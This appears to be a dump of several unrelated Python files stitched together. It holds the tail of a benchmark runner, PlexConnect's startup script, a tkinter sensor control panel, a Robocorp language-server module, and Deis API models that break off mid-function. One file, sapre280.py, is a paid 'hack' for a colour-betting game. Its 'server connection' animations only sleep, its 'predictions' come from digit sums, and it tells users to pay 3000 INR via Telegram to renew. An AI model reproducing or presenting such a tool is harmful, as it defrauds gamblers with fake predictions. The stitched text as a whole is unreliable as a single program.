pre_process=pre_proc,
use_cache=args.cache,
count=count, **kwargs)
# load model to backend
model = backend.load(args.model, inputs=args.inputs, outputs=args.outputs)
final_results = {
"runtime": model.name(),
"version": model.version(),
"time": int(time.time()),
"cmdline": str(args),
}
#
# make one pass over the dataset to validate accuracy
#
count = ds.get_item_count()
# warmup
ds.load_query_samples([0])
for _ in range(5):
img, _ = ds.get_samples([0])
_ = backend.predict({backend.inputs[0]: img})
ds.unload_query_samples(None)
for scenario in args.scenario:
runner_map = {
lg.TestScenario.SingleStream: RunnerBase,
lg.TestScenario.MultiStream: QueueRunner,
lg.TestScenario.Server: QueueRunner,
lg.TestScenario.Offline: QueueRunner
}
runner = runner_map[scenario](model, ds, args.threads, post_proc=post_proc, max_batchsize=args.max_batchsize)
def issue_queries(query_samples):
runner.enqueue(query_samples)
def flush_queries(): pass
def process_latencies(latencies_ns):
# called by loadgen to show us the recorded latencies
global last_timeing
last_timeing = [t / NANO_SEC for t in latencies_ns]
settings = lg.TestSettings()
settings.scenario = scenario
settings.mode = lg.TestMode.PerformanceOnly
if args.accuracy:
settings.mode = lg.TestMode.AccuracyOnly
if args.time:
# override the time we want to run
settings.min_duration_ms = args.time * MILLI_SEC
settings.max_duration_ms = args.time * MILLI_SEC
if args.qps:
qps = float(args.qps)
settings.server_target_qps = qps
settings.offline_expected_qps = qps
if scenario == lg.TestScenario.SingleStream:
settings.min_query_count = args.queries_single
settings.max_query_count = args.queries_single
elif scenario == lg.TestScenario.MultiStream:
settings.min_query_count = args.queries_multi
settings.max_query_count = args.queries_multi
settings.multi_stream_samples_per_query = 4
elif scenario == lg.TestScenario.Server:
max_latency = args.max_latency
elif scenario == lg.TestScenario.Offline:
settings.min_query_count = args.queries_offline
settings.max_query_count = args.queries_offline
sut = lg.ConstructSUT(issue_queries, flush_queries, process_latencies)
qsl = lg.ConstructQSL(count, min(count, 1000), ds.load_query_samples, ds.unload_query_samples)
if scenario == lg.TestScenario.Server:
for target_latency in max_latency:
log.info("starting {}, latency={}".format(scenario, target_latency))
settings.server_target_latency_ns = int(target_latency * NANO_SEC)
result_dict = {"good": 0, "total": 0, "scenario": str(scenario)}
runner.start_run(result_dict, args.accuracy)
lg.StartTest(sut, qsl, settings)
if not last_timeing:
last_timeing = runner.result_timing
if args.accuracy:
post_proc.finalize(result_dict, ds, output_dir=os.path.dirname(args.output))
add_results(final_results, "{}-{}".format(scenario, target_latency),
result_dict, last_timeing, time.time() - ds.last_loaded, args.accuracy)
else:
log.info("starting {}".format(scenario))
result_dict = {"good": 0, "total": 0, "scenario": str(scenario)}
runner.start_run(result_dict, args.accuracy)
lg.StartTest(sut, qsl, settings)
if not last_timeing:
last_timeing = runner.result_timing
if args.accuracy:
post_proc.finalize(result_dict, ds, output_dir=os.path.dirname(args.output))
add_results(final_results, "{}".format(scenario),
result_dict, last_timeing, time.time() - ds.last_loaded, args.accuracy)
runner.finish()
lg.DestroyQSL(qsl)
lg.DestroySUT(sut)
#
# write final results
#
if args.output:
with open(args.output, "w") as f:
json.dump(final_results, f, sort_keys=True, indent=4)
if __name__ == "__main__":
main()
|
PlexConnect.py
|
#!/usr/bin/env python
"""
PlexConnect
Sources:
inter-process-communication (queue): http://pymotw.com/2/multiprocessing/communication.html
"""
import sys, time
from os import sep
import socket
from multiprocessing import Process, Pipe
from multiprocessing.managers import BaseManager
import signal, errno
import argparse
from Version import __VERSION__
import DNSServer, WebServer
import Settings, ATVSettings
from PILBackgrounds import isPILinstalled
from Debug import * # dprint()
CONFIG_PATH = '.'
def getIP_self():
cfg = param['CSettings']
if cfg.getSetting('enable_plexgdm')=='False':
dprint('PlexConnect', 0, "IP_PMS: "+cfg.getSetting('ip_pms'))
if cfg.getSetting('enable_plexconnect_autodetect')=='True':
# determine the local IP this machine uses for outbound connections
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('1.2.3.4', 1000))
IP = s.getsockname()[0]
dprint('PlexConnect', 0, "IP_self: "+IP)
else:
# manual override from "settings.cfg"
IP = cfg.getSetting('ip_plexconnect')
dprint('PlexConnect', 0, "IP_self (from settings): "+IP)
return IP
# initializer for Manager, proxy-ing ATVSettings to WebServer/XMLConverter
def initProxy():
signal.signal(signal.SIGINT, signal.SIG_IGN)
procs = {}
pipes = {}
param = {}
running = False
def startup():
global procs
global pipes
global param
global running
# Settings
cfg = Settings.CSettings(CONFIG_PATH)
param['CSettings'] = cfg
# Logfile
if cfg.getSetting('logpath').startswith('.'):
# relative to current path
logpath = sys.path[0] + sep + cfg.getSetting('logpath')
else:
# absolute path
logpath = cfg.getSetting('logpath')
param['LogFile'] = logpath + sep + 'PlexConnect.log'
param['LogLevel'] = cfg.getSetting('loglevel')
dinit('PlexConnect', param, True) # init logging, new file, main process
dprint('PlexConnect', 0, "Version: {0}", __VERSION__)
dprint('PlexConnect', 0, "Python: {0}", sys.version)
dprint('PlexConnect', 0, "Host OS: {0}", sys.platform)
dprint('PlexConnect', 0, "PILBackgrounds: Is PIL installed? {0}", isPILinstalled())
# more Settings
param['IP_self'] = getIP_self()
param['HostToIntercept'] = cfg.getSetting('hosttointercept')
param['baseURL'] = 'http://'+ param['HostToIntercept']
# proxy for ATVSettings
proxy = BaseManager()
proxy.register('ATVSettings', ATVSettings.CATVSettings)
proxy.start(initProxy)
param['CATVSettings'] = proxy.ATVSettings(CONFIG_PATH)
running = True
# init DNSServer
if cfg.getSetting('enable_dnsserver')=='True':
master, slave = Pipe() # endpoint [0]-PlexConnect, [1]-DNSServer
proc = Process(target=DNSServer.Run, args=(slave, param))
proc.start()
time.sleep(0.1)
if proc.is_alive():
procs['DNSServer'] = proc
pipes['DNSServer'] = master
else:
dprint('PlexConnect', 0, "DNSServer not alive. Shutting down.")
running = False
# init WebServer
if running:
master, slave = Pipe() # endpoint [0]-PlexConnect, [1]-WebServer
proc = Process(target=WebServer.Run, args=(slave, param))
proc.start()
time.sleep(0.1)
if proc.is_alive():
procs['WebServer'] = proc
pipes['WebServer'] = master
else:
dprint('PlexConnect', 0, "WebServer not alive. Shutting down.")
running = False
# init WebServer_SSL
if running and \
cfg.getSetting('enable_webserver_ssl')=='True':
master, slave = Pipe() # endpoint [0]-PlexConnect, [1]-WebServer
proc = Process(target=WebServer.Run_SSL, args=(slave, param))
proc.start()
time.sleep(0.1)
if proc.is_alive():
procs['WebServer_SSL'] = proc
pipes['WebServer_SSL'] = master
else:
dprint('PlexConnect', 0, "WebServer_SSL not alive. Shutting down.")
running = False
# not started successfully - clean up
if not running:
cmdShutdown()
shutdown()
return running
def run(timeout=60):
# idle until shutdown is requested; the sleep is interrupted by signals
try:
time.sleep(timeout)
except IOError as e:
if e.errno == errno.EINTR and not running:
pass # mask "IOError: [Errno 4] Interrupted function call"
else:
raise
return running
def shutdown():
for slave in procs:
procs[slave].join()
param['CATVSettings'].saveSettings()
dprint('PlexConnect', 0, "Shutdown")
def cmdShutdown():
global running
running = False
# send shutdown to all pipes
for slave in pipes:
pipes[slave].send('shutdown')
dprint('PlexConnect', 0, "Shutting down.")
def sighandler_shutdown(signum, frame):
signal.signal(signal.SIGINT, signal.SIG_IGN) # we heard you!
cmdShutdown()
if __name__=="__main__":
signal.signal(signal.SIGINT, sighandler_shutdown)
signal.signal(signal.SIGTERM, sighandler_shutdown)
parser = argparse.ArgumentParser()
parser.add_argument('--config_path', metavar='<config_path>', required=False,
help='path of folder containing config files, relative to PlexConnect.py')
args = parser.parse_args()
if args.config_path:
CONFIG_PATH = args.config_path
dprint('PlexConnect', 0, "***")
dprint('PlexConnect', 0, "PlexConnect")
dprint('PlexConnect', 0, "Press CTRL-C to shut down.")
dprint('PlexConnect', 0, "***")
running = startup()
while running:
running = run()
shutdown()
|
main.py
|
import tkinter as tk
import threading
import sys
from tkinter import ttk
from tkinter import simpledialog
from page import Page
from homepage import Homepage
class Layout(tk.Frame):
def __init__(self, *args, **kwargs):
"""
This is the initialization of the Layout class, which is the main class of the application. It inherits from
tk.Frame. All app management happens here, as well as the buttons and functionality that are shown
independently of the type of page opened.
"""
tk.Frame.__init__(self, *args, **kwargs)
# Set up the two frames which are used all the time. The button frame is where all of the page buttons
# are placed. The container is the rest of the screen. Note: the app is designed for a Full HD display.
self.button_frame = tk.Frame(self, height=40)
self.container = tk.Frame(self, height=1860)
self.button_frame.pack(anchor='nw', fill="both", expand=True)
self.container.pack(anchor='nw', fill="both", expand=True)
# x coordinate at which the page buttons start being placed.
self.page_but_x = 130
# An instance of ttk.Style() is needed to manage widget appearance, such as text size or font type.
self.style = ttk.Style()
self.font = 'Segoe'
# Maximum update interval (in ms) used for refreshing logs, graphs, data, etc.
self.update_time = 5000
# Set up the homepage, an instance of the Homepage class. Place it in 'container' at x=0 and y=0, which
# is actually x=0 and y=40 on the whole screen.
self.homepage = Homepage(update_time=self.update_time)
self.homepage.place(in_=self.container, x=0, y=0, relwidth=1, relheight=1)
# Buffer holding all page instances.
self.pages = []
# Number of MQTT clients, which is equivalent to the number of pages.
self.clients = 0
# Initialize the buttons, add one page and show the homepage again.
self.buttons_init()
self.add_page()
self.homepage.show()
# Start a new thread that works independently in the background. With daemon set to True
# the thread is killed when the app is closed.
self.loop = threading.Thread(target=self.homepage_update, daemon=True)
self.loop.start()
def buttons_init(self):
"""
Declare all buttons and place them on the screen. These buttons live in button_frame, so they are shown
all the time.
"""
self.buttons = []
self.style.configure('TButton', font=('Segoe', 10))
self.page_choose_entry_visible = False
self.homepage_button = ttk.Button(self.button_frame, text="Main panel", style='TButton', command=self.homepage.show)
self.add_page_button = ttk.Button(self.button_frame, text="Add", style='TButton', command=self.add_page)
self.delete_page_button = ttk.Button(self.button_frame, text="Delete", style='TButton', command=self.delete_page)
self.add_many_button = ttk.Button(self.button_frame, text="Add many", style='TButton', command=self.add_many)
self.delete_many_button = ttk.Button(self.button_frame, text="Delete many", style='TButton', command=self.delete_many)
self.delete_page_button.place(in_=self.button_frame, x=1850, y=10, width=60, height=30)
self.add_page_button.place(in_=self.button_frame, x=1790, y=10, width=60, height=30)
self.delete_many_button.place(in_=self.button_frame, x=1680, y=10, width=110, height=30)
self.add_many_button.place(in_=self.button_frame, x=1590, y=10, width=90, height=30)
self.homepage_button.place(in_=self.button_frame, x=10, y=10, width=110, height=30)
def homepage_update(self):
"""
Homepage update function. It checks whether the 'connect all' button on the homepage was pressed. If it was, it
connects to all devices declared on the pages. 'Disconnect all' works analogously. This function also passes data
from all the pages to the homepage, so values from each Page instance can be managed in Homepage as well,
separately.
"""
if self.homepage.connect_all_flag == True:
self.connect_all()
elif self.homepage.connect_all_flag == False:
self.disconnect_all()
self.homepage.connect_all_flag = None
for i in range(self.clients):
if self.pages[i].connected:
data = self.pages[i].get_recent_data()
if data != None:
self.homepage.data_update(data)
else:
continue
# Use the tkinter after() method: it re-schedules the given function after the given delay. Here it runs
# self.homepage_update every 2.5 s, so the rest of the app stays usable while the updates run in the
# background. (A standalone sketch of this idiom follows the Layout class.)
self.home_update_after = self.after(int(self.update_time/2), self.homepage_update)
def connect_all(self):
""" Connect with all devices. """
for i in range(self.clients):
if self.pages[i].connected:
continue
else:
self.pages[i].connect()
self.pages[i].connected = True
def disconnect_all(self):
""" Disonnect with all devices. """
for i in range(self.clients):
if not self.pages[i].connected:
continue
else:
self.pages[i].disconnect()
self.pages[i].connected = False
def add_page(self):
""" Add page."""
self.clients += 1
page = Page(client_id=self.clients, update_time=self.update_time)
page.place(in_=self.container, x=0, y=0, relwidth=1, relheight=1)
self.pages.append(page)
button = ttk.Button(text=f"{self.clients}", style='TButton', command=self.pages[self.clients-1].show)
if self.clients <= 40:
button.place(in_=self.button_frame, x=self.page_but_x, y=10, width=30, height=30)
else:
self.show_page_choose_entry()
self.page_but_x += 30 + 2
self.buttons.append(button)
def show_page_choose_entry(self):
""" Show entry box responsible for getting page ID. At default it has client ID typed in. """
if not self.page_choose_entry_visible:
self.page_choose_entry_visible = True
self.entry = tk.StringVar()
self.id_choose_entry = ttk.Entry(self, textvariable=self.entry, font=(self.font, 11, 'normal'))
self.id_choose_button = ttk.Button(text='Open page', style='TButton',
command=self.show_page_by_num)
self.id_choose_button.place(x=1435, y=10, height=30, width=92)
self.id_choose_entry.place(x=1527, y=10.5, height=28, width=35)
self.entry.set(self.clients)
def show_page_by_num(self):
""" Show page by number typed in entrybox. """
try:
num = int(self.entry.get()) - 1
self.pages[num].show()
except IndexError:
pass
def hide_page_choose_entry(self):
""" Hide page choose entry box."""
self.page_choose_entry_visible = False
self.id_choose_button.place_forget()
self.id_choose_entry.place_forget()
def add_many(self):
""" Add many pages. It just runs add_page function declared amount of times. """
try:
amount = simpledialog.askstring(title="Add many", prompt="Amount of pages to add:")
for i in range(int(amount)):
self.add_page()
except:
return
def delete_page(self):
""" Delete page unless there is one left. """
if self.clients < 2:
return
else:
self.clients -= 1
if self.clients <= 40 and self.page_choose_entry_visible:
self.hide_page_choose_entry()
elif self.page_choose_entry_visible:
self.entry.set(self.clients)
self.pages[-1].delete()
self.pages = self.pages[:-1]
self.buttons[-1].place_forget()
self.buttons = self.buttons[:-1]
self.page_but_x -= 30 + 2
self.pages[self.clients-1].show()
def delete_many(self):
""" Delete many pages. It just runs delete_page function declared amount of times. """
try:
amount = simpledialog.askstring(title="Delete many", prompt="Amount of pages to delete:")
for i in range(int(amount)):
self.delete_page()
except:
return
def close(self):
""" Runs when app is closed. sys.exit() closes the app even after converting app to exe file. """
self.destroy()
sys.exit()
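# ---------------------------------------------------------------------------
# Hedged sketch (illustration only, not used by the app): homepage_update
# above re-schedules itself with after(), which is the standard tkinter way to
# run periodic work without blocking the event loop. The self-contained toy
# below shows the idiom; _after_demo is an invented name and needs a display
# to actually run.
def _after_demo():
    import tkinter as tk_demo
    demo_root = tk_demo.Tk()
    ticks = {"count": 0}

    def tick():
        ticks["count"] += 1
        if ticks["count"] >= 3:  # stop after three ticks
            demo_root.destroy()
            return
        demo_root.after(500, tick)  # re-schedule: run again in 500 ms

    demo_root.after(500, tick)
    demo_root.mainloop()
    print("ticks:", ticks["count"])  # 3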
if __name__ == "__main__":
# Initiate tkinter window.
root = tk.Tk()
# Show the window maximized by default.
root.state('zoomed')
# The window is based on the Layout class.
main = Layout(root)
# Pack the 'main' in root and basically fill whole screen with it.
main.pack(side="top", fill="both", expand=True)
# Set the window size to 1920x1080 and allow resizing, although resizing is not recommended.
root.wm_geometry("1920x1080")
root.resizable(width=True, height=True)
# Set title of window.
root.title('MAX30102 control panel')
# Define the function that is called when the window is closed.
root.protocol("WM_DELETE_WINDOW", main.close)
# Start tkinter mainloop of root declared.
root.mainloop()
|
sapre280.py
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
from os import system, name
import itertools
import threading
import time
import sys
import datetime
from base64 import b64decode,b64encode
from datetime import date
expirydate = datetime.date(2022, 1, 13 )
#expirydate = datetime.date(2021, 12, 30)
today=date.today()
def hero():
def chalo():
done = False
#here is the animation
def animate():
for c in itertools.cycle(['|', '/', '-', '\\']) :
if done:
break
sys.stdout.write('\rconnecting to server for next colour--------- ' + c)
sys.stdout.flush()
time.sleep(0.1)
sys.stdout.write('\rDone! ')
t = threading.Thread(target=animate)
t.start()
#long process here
time.sleep(20)
done = True
def chalo1():
done = False
#here is the animation
def animate():
for c in itertools.cycle(['|', '/', '-', '\\']):
if done:
break
sys.stdout.write('\rgetting the colour wait --------- ' + c)
sys.stdout.flush()
time.sleep(0.1)
sys.stdout.write('\rDone! ')
t = threading.Thread(target=animate)
t.start()
#long process here
time.sleep(20)
done = True
def clear():
# for windows
if name == 'nt':
_ = system('cls')
# for mac and linux(here, os.name is 'posix')
else:
_ = system('clear')
clear()
y=1
newperiod=period
banner='figlet Rxce 7.o '
thisway=[0,2,4,6,8,10,12,14,16,18,20]
thatway=[1,3,5,7,9,11,13,15,17,19]
numbers=[]
i=1
while(y):
clear()
system(banner)
print("Contact me on telegram @Hackmgk")
print("Enter" ,newperiod,"Price :")
current=input()
current=int(current)
chalo()
print("\n---------Successfully Connected to the server-----------")
chalo1()
print("\n---------Successfully got the colour -------------")
print('\n')
def getSum(n):
sum=0
for digit in str(n):
sum += int(digit)
return sum
if i in thisway:
m=getSum(current)
n=int(current)%10
if((m%2==0 and n%2==0) or (m%2==1 and n%2==1)):
if current in numbers:
print(newperiod+1," : 💥🟢GREEN1🟢💥")
else:
print(newperiod+1," : 💥🔴RED2🔴💥")
else:
if current in numbers:
print(newperiod+1," : 💥🔴RED3🔴💥")
else:
print(newperiod+1," : 💥🟢GREEN4🟢💥")
if i in thatway:
m=getSum(current)+1
n=int(current)%10
if((m%2==0 and n%2==0) or (m%2==1 and n%2==1)):
if current in numbers:
print(newperiod+1,": 💥💥🔴RED5🔴💥💥")
else:
print(newperiod+1,": 💥💥🔴RED6🔴💥💥")
else:
if current in numbers:
print(newperiod+1,": 💥💥🟢GREEN6🟢💥💥")
else:
print(newperiod+1,": 💥💥🔴RED7🔴💥💥")
i=i+1
newperiod+=1
numbers.append(current)
y=input("Do you want to play : Press 1 and 0 to exit \n")
if(y=='0'):
y=False
if (len(numbers)>15):
clear()
system('figlet Thank you!!')
print("Play on next specified time!!")
print("-----------Current Time UP----------")
sys.exit(" \n \n \n Contact on Telegram @Hackmgk")
print(numbers)
if(expirydate>today):
now = datetime.datetime.now()
First = now.replace(hour=10, minute=55, second=0, microsecond=0)
Firstend = now.replace(hour=11, minute=35, second=0, microsecond=0)
Second = now.replace(hour=13, minute=55, second=0, microsecond=0)
Secondend = now.replace(hour=14, minute=35, second=0, microsecond=0)
Third = now.replace(hour=16, minute=55, second=0, microsecond=0)
Thirdend = now.replace(hour=17, minute=35, second=0, microsecond=0)
Final = now.replace(hour=19, minute=55, second=0, microsecond=0)
Finalend = now.replace(hour=20, minute=35, second=0, microsecond=0)
FFinal = now.replace(hour=22, minute=55, second=0, microsecond=0)
FFinalend = now.replace(hour=23, minute=35, second=0, microsecond=0)
if (now>First and now<Firstend):
period=220
hero()
elif(now>Second and now<Secondend):
period=280
hero()
elif(now>Third and now<Thirdend):
period=340
hero()
elif(now>Final and now<Finalend):
period=400
hero()
elif(now>FFinal and now<FFinalend):
period=460
hero()
else:
banner='figlet Rxce 7.o '
print("Hi!! Thanks for buying Life time the hack")
print("----------Your play time-----------")
print(" 11:00 PM- 11:35 PM")
print(" 02:00 PM- 02:35 PM")
print(" 05:00 PM- 05:35 PM")
print(" 08:00 PM- 08:35 PM")
print(" 11:00 PM- 12:35 PM")
print("Please play on the given time, and ")
print("If you think it is an error contact")
print(" admin on telegram @Hackmgk ")
else:
banner='figlet Thank '
system(banner)
print("*---------*----------*-------------*----------*")
print("Your hack has expired--- Please contact")
print(" on telegram ----@hackmgk for activating")
print(" Recharge Amount : Total limit " )
print(" 2. 3000 INR ------- 30 Days")
print("*---------*----------*-------------*----------*")
print("Your custom hack can be made request from us.")
print( "Msg me on telegram @hackmgk")
|
python_ls.py
|
# Original work Copyright 2017 Palantir Technologies, Inc. (MIT)
# See ThirdPartyNotices.txt in the project root for license information.
# All modifications Copyright (c) Robocorp Technologies Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
from robocorp_ls_core.robotframework_log import get_logger
from robocorp_ls_core.protocols import IConfig, IWorkspace
from typing import Optional
import socketserver
import threading
from robocorp_ls_core.jsonrpc.dispatchers import MethodDispatcher
from robocorp_ls_core.jsonrpc.endpoint import Endpoint
from robocorp_ls_core.jsonrpc.streams import JsonRpcStreamReader, JsonRpcStreamWriter
from robocorp_ls_core import uris
log = get_logger(__name__)
class _StreamHandlerWrapper(socketserver.StreamRequestHandler, object):
"""A wrapper class that is used to construct a custom handler class."""
delegate = None
def setup(self):
super(_StreamHandlerWrapper, self).setup()
self.delegate = self.DELEGATE_CLASS(self.rfile, self.wfile) # noqa
def handle(self):
try:
self.delegate.start()
except OSError as e:
if os.name == "nt":
# Catch and pass on ConnectionResetError when parent process
# dies
if isinstance(e, WindowsError) and e.winerror == 10054:
pass
self.SHUTDOWN_CALL() # noqa
class _DummyStdin(object):
def __init__(self, original_stdin=sys.stdin, *args, **kwargs):
try:
self.encoding = sys.stdin.encoding
except:
# Not sure if it's available in all Python versions...
pass
self.original_stdin = original_stdin
try:
self.errors = (
sys.stdin.errors
) # Who knew? sys streams have an errors attribute!
except:
# Not sure if it's available in all Python versions...
pass
def readline(self, *args, **kwargs):
return "\n"
def read(self, *args, **kwargs):
return self.readline()
def write(self, *args, **kwargs):
pass
def flush(self, *args, **kwargs):
pass
def close(self, *args, **kwargs):
pass
def binary_stdio():
"""Construct binary stdio streams (not text mode).
This seems to differ between Windows/Unix and Python 2/3, so going by:
https://stackoverflow.com/questions/2850893/reading-binary-data-from-stdin
"""
PY3K = sys.version_info >= (3, 0)
if PY3K:
stdin, stdout = sys.stdin.buffer, sys.stdout.buffer
else:
# Python 2 on Windows opens sys.stdin in text mode, and
# binary data read from it becomes corrupted on \r\n
if sys.platform == "win32":
# set sys.stdin to binary mode
import msvcrt
msvcrt.setmode(sys.stdin.fileno(), os.O_BINARY)
msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY)
stdin, stdout = sys.stdin, sys.stdout
sys.stdin, sys.stdout = (_DummyStdin(), open(os.devnull, "w"))
return stdin, stdout
def start_tcp_lang_server(
bind_addr, port, handler_class, after_bind=lambda server: None
):
"""
:param bind_addr: Address to bind the TCP server to.
:param port: Port to listen on (pass 0 to let the OS pick a free port).
:param handler_class: MethodDispatcher subclass used to handle each connection.
:param after_bind:
Called right after server.bind (so, it's possible to get the port with
server.socket.getsockname() if port 0 was passed).
"""
def create_handler(_, *args, **kwargs):
method_dispatcher = handler_class(*args, **kwargs)
if not isinstance(method_dispatcher, MethodDispatcher):
raise ValueError("Handler class must be an instance of MethodDispatcher")
return method_dispatcher
def shutdown_server(*args):
log.debug("Shutting down server")
# Shutdown call must be done on a thread, to prevent deadlocks
stop_thread = threading.Thread(target=server.shutdown)
stop_thread.start()
# Construct a custom wrapper class around the user's handler_class
wrapper_class = type(
handler_class.__name__ + "Handler",
(_StreamHandlerWrapper,),
{"DELEGATE_CLASS": create_handler, "SHUTDOWN_CALL": shutdown_server},
)
server = socketserver.TCPServer(
(bind_addr, port), wrapper_class, bind_and_activate=False
)
server.allow_reuse_address = True
try:
server.server_bind()
server.server_activate()
after_bind(server)
log.info(
"Serving %s on (%s, %s) - pid: %s",
handler_class.__name__,
bind_addr,
port,
os.getpid(),
)
server.serve_forever()
finally:
log.info("Shutting down")
server.server_close()
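# Usage sketch (illustrative helper; not called anywhere in this module): as the docstring of
# start_tcp_lang_server notes, passing port 0 lets the OS pick a free port, and `after_bind`
# is the hook to read the chosen port back before serve_forever() blocks.
def _example_serve_on_free_port(handler_class):
    def _print_port(server):
        _, port = server.socket.getsockname()
        log.info("Language server listening on port %s", port)
    start_tcp_lang_server("127.0.0.1", 0, handler_class, after_bind=_print_port)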
def start_io_lang_server(rfile, wfile, handler_class):
if not issubclass(handler_class, MethodDispatcher):
raise ValueError("Handler class must be an instance of MethodDispatcher")
log.info(
"Starting %s IO language server. pid: %s", handler_class.__name__, os.getpid()
)
server = handler_class(rfile, wfile)
server.start()
class PythonLanguageServer(MethodDispatcher):
""" Implementation of the Microsoft VSCode Language Server Protocol
https://github.com/Microsoft/language-server-protocol/blob/master/versions/protocol-1-x.md
Based on: https://github.com/palantir/python-language-server/blob/develop/pyls/python_ls.py
"""
def __init__(self, read_stream, write_stream):
from robocorp_ls_core.lsp import LSPMessages
self._config: IConfig = self._create_config()
self._workspace: Optional[IWorkspace] = None
self.root_uri = None
self.watching_thread = None
self.uri_workspace_mapper = {}
self._jsonrpc_stream_reader = JsonRpcStreamReader(read_stream)
self._jsonrpc_stream_writer = JsonRpcStreamWriter(write_stream)
self._endpoint = Endpoint(self, self._jsonrpc_stream_writer.write)
self._lsp_messages = LSPMessages(self._endpoint)
self._shutdown = False
@property
def workspace(self) -> Optional[IWorkspace]:
return self._workspace
@workspace.setter
def workspace(self, workspace: IWorkspace) -> None:
self._workspace = workspace
self._on_workspace_set(workspace)
def _on_workspace_set(self, workspace: IWorkspace):
pass
@property # i.e.: read-only
def config(self) -> IConfig:
return self._config
def start(self):
"""Entry point for the server."""
self._jsonrpc_stream_reader.listen(self._endpoint.consume)
def m_shutdown(self, **_kwargs):
self._shutdown = True
def m_exit(self, **_kwargs):
self._endpoint.shutdown()
# If there's someone reading, we could deadlock here.
self._jsonrpc_stream_reader.close()
self._jsonrpc_stream_writer.close()
def capabilities(self):
return {} # Subclasses should override for capabilities.
def m_initialize(
self,
processId=None,
rootUri=None,
rootPath=None,
initializationOptions=None,
workspaceFolders=None,
**_kwargs,
) -> dict:
from robocorp_ls_core.basic import exit_when_pid_exists
from robocorp_ls_core.lsp import WorkspaceFolder
log.debug(
"Language server initialized with:\n processId: %s\n rootUri: %s\n rootPath: %s\n initializationOptions: %s\n workspaceFolders: %s",
processId,
rootUri,
rootPath,
initializationOptions,
workspaceFolders,
)
if rootUri is None:
rootUri = uris.from_fs_path(rootPath) if rootPath is not None else ""
self.root_uri = rootUri
if workspaceFolders:
workspaceFolders = [WorkspaceFolder(**w) for w in workspaceFolders]
self.workspace = self._create_workspace(rootUri, workspaceFolders or [])
if processId not in (None, -1, 0):
exit_when_pid_exists(processId)
# Get our capabilities
return {"capabilities": self.capabilities()}
def _create_config(self) -> IConfig:
raise NotImplementedError(f"Not implemented in: {self.__class__}")
def _create_workspace(self, root_uri, workspace_folders) -> IWorkspace:
from robocorp_ls_core.workspace import Workspace
return Workspace(root_uri, workspace_folders)
def m_initialized(self, **_kwargs):
pass
def lint(self, doc_uri, is_saved):
raise NotImplementedError(
"Subclasses must override (current class: %s)." % (self.__class__,)
)
def cancel_lint(self, doc_uri):
raise NotImplementedError(
"Subclasses must override (current class: %s)." % (self.__class__,)
)
def m_text_document__did_close(self, textDocument=None, **_kwargs) -> None:
ws = self.workspace
doc_uri = textDocument["uri"]
if ws is not None:
ws.remove_document(doc_uri)
self.cancel_lint(doc_uri)
def m_text_document__did_open(self, textDocument=None, **_kwargs) -> None:
from robocorp_ls_core.lsp import TextDocumentItem
ws = self.workspace
if ws is not None:
ws.put_document(TextDocumentItem(**textDocument))
self.lint(textDocument["uri"], is_saved=True)
def m_text_document__did_change(
self, contentChanges=None, textDocument=None, **_kwargs
):
from robocorp_ls_core.lsp import TextDocumentItem
from robocorp_ls_core.lsp import TextDocumentContentChangeEvent
if contentChanges:
text_document_item = TextDocumentItem(**textDocument)
for change in contentChanges:
try:
range = change.get("range", None)
range_length = change.get("rangeLength", 0)
text = change.get("text", "")
self.workspace.update_document(
text_document_item,
TextDocumentContentChangeEvent(
range=range, rangeLength=range_length, text=text
),
)
except:
log.exception(
"Error updating document: %s with changes: %s"
% (textDocument, contentChanges)
)
self.lint(textDocument["uri"], is_saved=False)
def m_text_document__did_save(self, textDocument=None, **_kwargs):
self.lint(textDocument["uri"], is_saved=True)
def m_workspace__did_change_configuration(self, settings=None) -> None:
self.config.update(settings or {})
def m_workspace__did_change_workspace_folders(self, event=None):
"""Adds/Removes folders from the workspace."""
from robocorp_ls_core.lsp import WorkspaceFolder
log.info(f"Workspace folders changed: {event}")
added_folders = []
removed_folders = []
if event:
added_folders = event.get("added", [])
removed_folders = event.get("removed", [])
for f_add in added_folders:
self.workspace.add_folder(WorkspaceFolder(**f_add))
for f_remove in removed_folders:
self.workspace.remove_folder(f_remove["uri"])
def m_workspace__did_change_watched_files(self, changes=None, **_kwargs):
pass
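# Usage sketch (illustrative; not invoked by this module): a typical entry point wires the
# binary stdio streams from binary_stdio() into start_io_lang_server(). The argument is
# expected to be a PythonLanguageServer subclass that implements _create_config, lint and
# cancel_lint; no such concrete class is defined here.
def _example_stdio_main(language_server_class):
    stdin, stdout = binary_stdio()
    start_io_lang_server(stdin, stdout, language_server_class)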
|
models.py
|
# -*- coding: utf-8 -*-
"""
Data models for the Deis API.
"""
from __future__ import unicode_literals
import base64
from datetime import datetime
import etcd
import importlib
import logging
import re
import time
from threading import Thread
from django.conf import settings
from django.contrib.auth import get_user_model
from django.core.exceptions import ValidationError, SuspiciousOperation
from django.db import models
from django.db.models import Count
from django.db.models import Max
from django.db.models.signals import post_delete, post_save
from django.dispatch import receiver
from django.utils.encoding import python_2_unicode_compatible
from docker.utils import utils as dockerutils
from json_field.fields import JSONField
from OpenSSL import crypto
import requests
from rest_framework.authtoken.models import Token
from api import fields, utils, exceptions
from registry import publish_release
from utils import dict_diff, fingerprint
logger = logging.getLogger(__name__)
def close_db_connections(func, *args, **kwargs):
"""
Decorator to explicitly close db connections during threaded execution
Note this is necessary to work around:
https://code.djangoproject.com/ticket/22420
"""
def _close_db_connections(*args, **kwargs):
ret = None
try:
ret = func(*args, **kwargs)
finally:
from django.db import connections
for conn in connections.all():
conn.close()
return ret
return _close_db_connections
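# Usage sketch (hypothetical helper, not used by this module): any ORM-touching function that
# runs on a worker Thread can be wrapped with the decorator above so its database connections
# are closed on exit, per the Django ticket referenced in the docstring.
@close_db_connections
def _example_count_run_containers(app):
    return app.container_set.filter(type='run').count()
# e.g. Thread(target=_example_count_run_containers, args=(some_app,)).start()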
def log_event(app, msg, level=logging.INFO):
# controller needs to know which app this log comes from
logger.log(level, "{}: {}".format(app.id, msg))
app.log(msg, level)
def validate_base64(value):
"""Check that value contains only valid base64 characters."""
try:
